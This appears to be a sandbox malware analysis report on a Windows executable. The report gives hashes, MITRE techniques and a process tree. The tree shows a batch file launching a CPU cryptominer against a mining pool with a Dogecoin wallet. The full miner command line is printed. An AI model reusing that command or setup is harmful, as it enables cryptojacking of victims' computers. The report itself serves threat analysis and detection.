73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 19:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2000	b2e.exe
5300	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5300	cpuminer-sse2.exe
5300	cpuminer-sse2.exe
5300	cpuminer-sse2.exe
5300	cpuminer-sse2.exe
5300	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4612-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4612 wrote to memory of 2000	4612	batexe.exe	85
PID 4612 wrote to memory of 2000	4612	batexe.exe	85
PID 4612 wrote to memory of 2000	4612	batexe.exe	85
PID 2000 wrote to memory of 752	2000	b2e.exe	86
PID 2000 wrote to memory of 752	2000	b2e.exe	86
PID 2000 wrote to memory of 752	2000	b2e.exe	86
PID 752 wrote to memory of 5300	752	cmd.exe	89
PID 752 wrote to memory of 5300	752	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4612
- C:\Users\Admin\AppData\Local\Temp\388F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\388F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\388F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\430F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\388F.tmp\b2e.exe

Filesize
8.3MB

MD5
1905c6779b2bb6d8da53f81c4d2a601e

SHA1
817ab858ae7bcc70112e4ea3089b24e668c8b928

SHA256
580151b284a9d00086c1db7e15a4bd376b1bb78cd7b3169a18aab37d2368de68

SHA512
c511f032a3dd0c63c8cc223087edd6d0192206e4bdaf85acb0a135383ca96c5c6fa81528cebd62b815904b80edb58589c8b4dfca00d5bf1b2197ef7679f3dace

Download Submit
C:\Users\Admin\AppData\Local\Temp\388F.tmp\b2e.exe

Filesize
896KB

MD5
1f22d8bf5f6c3dda3e880ea1ba0417d4

SHA1
2a8dbf2319999a894714bdea650eb5be32c64c19

SHA256
afb7da96abe31529f462178372c48627a7e681e3c18cd2196aec8beee07f5b96

SHA512
217b89f6a74039807c135539482b1a769d715190f7756e2b0162a33da3d8ada909b80ca3fc1596e542f163f6a45726282997f4e52a36c352cc89b9e58c1e6e05

Download Submit
C:\Users\Admin\AppData\Local\Temp\388F.tmp\b2e.exe

Filesize
960KB

MD5
d15ecf39e70d4d6e278b0da9ff36ba87

SHA1
2139694bf96cc3b6fbfadb8a9c8745b8901bff6a

SHA256
04b2e6191d36dccb7b93c7d207ff16c0702cdec9b64b98206f9ffc7dc7633d54

SHA512
326cdd9b35aa3dbd39d2fd4a22dd78f732d481f05ef6dca085cd086d8ca91502f3be961b44e5c4bbf2ebf947ffc4f1b4d4703593951fce22acaa418a77741434

Download Submit
C:\Users\Admin\AppData\Local\Temp\430F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
128KB

MD5
87bb74a6790018700645a8310bb9a32a

SHA1
b0e3e91efa12e0df5ed4538d3b549ab5d9f6c16b

SHA256
ee6a846f1dcf082d5216bf314e65e1428af13ce54dfaaeb371d1c54f330c5298

SHA512
702e12a0858a1dd987d6a761f0ddc88fee9bce38be3d71f8c9be3fecc8cc6e88763967140f83caf4f2e10109ab95b811bb70bc70ff0b5cce8f0f32713ad3683b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
76KB

MD5
c81fc55b300eb06d445434af8652a71a

SHA1
8cf0b15df812b00ce740575f623925f336486080

SHA256
6395a72acec12efb83969b250bb1ce33c52a151f5656b0b83e75d12372814bb2

SHA512
ac24abe3dbb3f92313f18f5342b0381f8fb50e3f3d80b445a81a2acd60b67da5512e80bdd27ffd11b2b0ba47ecd4445345aaa641c10332e442ae2243b6e04795

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
34KB

MD5
13ba75a88bd2aa04afb8f2530ac03938

SHA1
b4af8ebe84a4449b539ef593182f049f5a50c9ea

SHA256
156602471e2aae690161d17029f1299a04c2f0635e68d3a5492d2ed7cffdd343

SHA512
d3b7a52629b5a5aeca2bda2d6a3be7e3881eed8c139dd9988b0ccfd0b4e649bd1b11680b04668e8d19c5e7cf500fcaae3bea6ac0f0e8f551f71bcda01a5a07e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
120KB

MD5
38b7be62803e750b74ee790dcc5a7a18

SHA1
0318dba41800d58c8fc569ce95e71bdf1fa7ee70

SHA256
7cc831cdddbbef0ddaf0cb96414b2b924529795a201cdd1289c9324eba931ea7

SHA512
66d9025a210a4fc466433456894b42f25043aa45677cb515ef417b991d35b63aa105075ea4d73cdf481fe34f44ee86910995645d67e8d9f2dbd741be4242bd7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
154KB

MD5
b214766c98312faf93e66e12a29caefd

SHA1
fb33eac625d0dc700a5741e8e4323246ec757ed3

SHA256
407e819a964feeeef433720a7446b3a44dfa2fa52b95b470bbae2f68e345e6a4

SHA512
b97739eb59e32f78a1b9d652cc75ce0426cb02ead9d976b249a4a4bdd8d4613d8ff804572ad681b35a79d53b0064276d7a675e26bd55b081e14d29a2cec6da9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
124KB

MD5
0b1e5f4baba9be45c72941f559dd41cf

SHA1
7f1eaa931a898032494e0a5b2b5c1b64f0f00d29

SHA256
d08afba5b67dec01655f767567d10ea2a3224966ac8086bc9baa65cc4f657bf8

SHA512
ca311f386d149680b400fbfe4a6f365fea41172c232a8bb5390065a3add95eadbb0d164f633208c32e9b2bb76565fb513ec66d23543e4283cbd117797a112089

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
58KB

MD5
2756266f1db9b3b27fc6c2e0d0eb5f11

SHA1
6b0693e8f0065ce8eff53f237d64e2338a727f76

SHA256
62abacca0a59791c6981282ed53449e196efb1e0a19748579916fb41e52d4de2

SHA512
a41199ba5b6231969a72587b5abe0ed8d3b912b1b899754a36ba3c6768b39a8c72f236aa7d117fc137405f72a53c0c4a91aab0fac911aa1c4b37a919bcbf5926

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
10KB

MD5
3a8db34f021c3ed2f8d258489a8315e6

SHA1
9d77ebe078e50d74eef83557be64faa4fe672504

SHA256
3e5482f25946e6ba65435cca5f938bf1a3612ecf25ccc09bdebd69b4d202bdf8

SHA512
265eb4e950214c0205ece926652c841815226ae58f4b4a0d1080d58415c54771ad3c64e5a74a363a8cf477e13cc5e34cc711add2987e0288cc99993769a6ea66

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
14KB

MD5
57bc28e77ba7f02252d5d1c6ebeb7e33

SHA1
03d31966e052d14ff5f92d69ceacf8fc886e003c

SHA256
094b3dcb3308d87ee8c065d27dc1e0ee818c68d37312bdbc03af9c88f20914aa

SHA512
c11bdf493da9bac705cf4d31330ad4bfe2e93c5aa6c0812c47906645e441981880cd651ab20b53e0e9770053d8e3b5a7acdd515ec74f6e16a8c2cdccf49229d4

Download Submit
memory/2000-54-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2000-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4612-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5300-49-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-60-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/5300-47-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/5300-48-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5300-41-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/5300-44-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5300-70-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-75-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-90-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-95-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-100-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5300-105-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download